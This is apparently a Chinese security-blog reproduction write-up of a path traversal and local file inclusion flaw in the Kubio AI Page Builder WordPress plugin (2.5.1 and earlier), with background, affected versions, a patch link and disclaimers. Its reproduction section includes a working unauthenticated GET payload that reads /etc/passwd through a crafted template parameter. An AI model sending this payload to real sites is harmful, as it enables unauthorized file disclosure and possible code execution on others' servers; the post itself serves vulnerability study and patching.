【成功复现】WordPress plugin Kubio AI Page Builder路径遍历漏洞

admin 2025年5月23日15:51:26评论3 views字数 855阅读2分51秒阅读模式

网安引领时代,弥天点亮未来  

【成功复现】WordPress plugin Kubio AI Page Builder路径遍历漏洞
0x00写在前面

      本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

【成功复现】WordPress plugin Kubio AI Page Builder路径遍历漏洞
0x01漏洞介绍
【成功复现】WordPress plugin Kubio AI Page Builder路径遍历漏洞

WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。

WordPress plugin Kubio AI Page Builder 2.5.1及之前版本存在路径遍历漏洞,该漏洞源于kubio_hybrid_theme_load_template函数存在本地文件包含,可能导致未认证攻击者包含和执行任意文件。

【成功复现】WordPress plugin Kubio AI Page Builder路径遍历漏洞
0x02影响版本

WordPress plugin Kubio AI Page Builder 2.5.1及之前版本

【成功复现】WordPress plugin Kubio AI Page Builder路径遍历漏洞
【成功复现】WordPress plugin Kubio AI Page Builder路径遍历漏洞
0x03漏洞复现

1.访问漏洞环境

【成功复现】WordPress plugin Kubio AI Page Builder路径遍历漏洞

2.对漏洞进行复现

POC 

漏洞复现

       1.GET请求获取服务器响应,确定使用Kubio AI Page Builder插件

【成功复现】WordPress plugin Kubio AI Page Builder路径遍历漏洞

       2.执行payload测试漏洞, 通过响应判断漏洞存在。

GET /?__kubio-site-edit-iframe-preview=1&__kubio-site-edit-iframe-classic-template=../../../../../../../../etc/passwd HTTP/1.1Host127.0.0.1
【成功复现】WordPress plugin Kubio AI Page Builder路径遍历漏洞

3.Yakit插件测试

【成功复现】WordPress plugin Kubio AI Page Builder路径遍历漏洞
【成功复现】WordPress plugin Kubio AI Page Builder路径遍历漏洞
0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

建议尽快升级修复漏洞,再次声明本文仅供学习使用,非法他用责任自负!

https://www.wordfence.com/threat-intel/vulnerabilities/id/2fb44c6e-520e-4a9f-9987-8b770feb710d?source=cve

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月23日15:51:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【成功复现】WordPress plugin Kubio AI Page Builder路径遍历漏洞https://cn-sec.com/archives/4084647.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息